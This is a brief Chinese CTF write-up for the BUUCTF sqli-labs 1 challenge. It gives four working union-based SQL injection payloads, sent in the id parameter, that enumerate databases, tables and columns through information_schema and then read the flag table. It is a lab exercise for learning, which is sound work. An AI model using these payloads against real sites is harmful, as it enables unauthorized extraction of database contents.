BUUCTF sqli-labs 1

这里就是单纯的找一下flag在哪,通关整个靶场在sql注入分区,虽然还没有通关。

这里要先看一下数据库都有哪些,用到语句:?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

发现这个数据库:ctftraining 可能有我们需要的信息

于是接着就是:

查看该数据库中都有什么表:?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),3--+

发现存在flag表,接着就是要看该表的信息:?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'),3--+

发现就只有一列,然后就是查看该列的信息:

这里需要注意,我们要指定是ctftraining数据库的flag表,如果单纯的是flag则是查找的security.flag这时就会报错。

正确语句:?id=-1' union select 1,(select group_concat(flag) from ctftraining.flag),3--+

相关推荐
麦聪聊数据3 小时前
跨云与多区服游戏架构下的数据库运维:基于webSQL的访问实践
数据库·sql·低代码·游戏·restful
Chockmans7 小时前
春秋云境CVE-2021-44915
web安全·网络安全·春秋云境·cve-2021-44915
Yupureki8 小时前
《实战项目-个人在线OJ平台》1.项目简介和演示
c语言·数据结构·c++·sql·算法·性能优化·html5
常利兵8 小时前
Android 开发探秘:View.post()为何能获取View宽高
java·数据库·sql
wanhengidc10 小时前
BGP服务器网络安全如何
运维·服务器·web安全
hutengyi11 小时前
开源的Text-to-SQL工具WrenAI
数据库·sql·开源
上海云盾王帅11 小时前
Web安全与风险全景解读:从基础概念到实战防御
安全·web安全
Leo6553511 小时前
动态 SQL(行+列) + 动态表头(前端+EasyPoi) = 完整透视报表系统
前端·sql·状态模式
你才是臭弟弟11 小时前
PostgreSQL + PostGIS(SQL操作)
数据库·sql·postgresql
麦聪聊数据11 小时前
金融外包场景下的数据库权限管控:基于 B/S 架构的访问隔离与审计实践
数据库·sql·低代码·金融·restful